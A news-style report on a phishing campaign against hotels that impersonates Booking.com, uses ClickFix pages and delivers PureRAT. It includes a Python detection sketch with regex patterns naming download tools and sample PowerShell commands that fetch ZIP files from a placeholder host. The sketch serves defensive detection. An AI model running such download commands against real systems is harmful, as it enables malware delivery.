Massive Phishing Campaign Targets Hospitality Industry with PureRAT
Full Transcript
Cybersecurity researchers have identified a large-scale phishing campaign targeting the hospitality sector, specifically hotels, with the deployment of PureRAT malware. This campaign utilizes compromised email accounts to send spear-phishing emails that impersonate Booking.com, leading hotel managers to malicious ClickFix-style pages designed to harvest their credentials.
According to Sekoia, the attackers craft emails that redirect victims to fake websites that present a reCAPTCHA challenge to appear legitimate. Once on these pages, users are tricked into executing a malicious PowerShell command that downloads a ZIP file containing PureRAT, a modular malware that provides wide-ranging capabilities, including remote access and keylogging.
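A detection sketch for the PowerShell step described above, added here as an example and not taken from Sekoia or the original page: it scores process-creation events for a PowerShell launch that downloads a ZIP archive, decoding any -EncodedCommand payload first. The event field names, the explorer.exe parent heuristic, and the sample events are assumptions constructed for illustration.

```python
import base64
import re

# Assumed event shape: dicts with image, parent_image, command_line (Sysmon-like fields).
DOWNLOAD = re.compile(r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget|"
                      r"start-bitstransfer|downloadfile|downloadstring)\b", re.I)
ZIP_URL = re.compile(r"https?://\S+?\.zip\b", re.I)
ENCODED = re.compile(r"\s-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)

def expand_encoded(cmdline):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE), if present."""
    m = ENCODED.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # not valid base64 or UTF-16LE: keep the raw command line
        return cmdline

def reasons(event):
    """Return the indicators present in one process-creation event."""
    if event["image"].lower().rsplit("\\", 1)[-1] not in ("powershell.exe", "pwsh.exe"):
        return []
    text = expand_encoded(event["command_line"])
    found = []
    if DOWNLOAD.search(text):
        found.append("download")
    if ZIP_URL.search(text):
        found.append("zip_url")
    # Assumption: a command pasted by the user (e.g. Run dialog) has explorer.exe as parent.
    if event["parent_image"].lower().endswith("\\explorer.exe"):
        found.append("explorer_parent")
    return found

def severity(event):
    """high = download + ZIP URL + interactive parent; medium = download + ZIP URL."""
    r = reasons(event)
    if "download" in r and "zip_url" in r:
        return "high" if "explorer_parent" in r else "medium"
    return None

# Constructed sample events (not from the campaign); example.invalid is a placeholder host.
_ENC = base64.b64encode(
    "Invoke-WebRequest https://files.example.invalid/b.zip -OutFile b.zip".encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLES = [dict(parent_image=p, image=PS, command_line=c) for p, c in [
    (r"C:\Windows\explorer.exe", 'powershell -c "iwr https://files.example.invalid/a.zip -OutFile a.zip"'),
    (r"C:\Windows\System32\cmd.exe", "powershell.exe -NoP -enc " + _ENC),
    (r"C:\Windows\System32\svchost.exe", r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
]]
```

Calling `severity(ev)` on each entry of `SAMPLES` gives one high, one medium and one unflagged event; tune the download and archive patterns against your own baseline before alerting on them.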
The threat actors aim to gain unauthorized access to booking platforms like Booking.com and Expedia, allowing them to sell stolen credentials or execute fraudulent schemes against hotel customers. The campaign has reportedly been active since at least April 2025, with operational activities continuing into October 2025.
Sekoia notes that the attackers are sourcing information about hotel administrators from cybercrime forums and are even offering payments based on the profits derived from these compromised accounts. They also employ traffers, specialists dedicated to malware distribution, to automate their efforts.
Furthermore, the campaign has expanded to contact hotel customers directly via WhatsApp or email, instructing them to click on links for verification purposes, which leads them to sites that mimic Booking.com or Expedia to steal banking information.
The data harvested from these phishing attacks is a lucrative commodity, often sold in illicit markets. Reports indicate that attackers have created Telegram bots to facilitate the purchase of Booking.com logs, with services offering to verify the authenticity of compromised accounts.
The ClickFix tactic has evolved: the fraudulent pages now integrate embedded videos and real-time counters to increase their perceived legitimacy. These evolving tactics make it increasingly difficult for users to discern legitimate requests from malicious ones, raising significant concerns about the cybersecurity posture of the hospitality industry.
As the threat landscape continues to adapt, experts urge the hospitality sector to strengthen its cybersecurity measures to protect sensitive data from such sophisticated phishing attacks.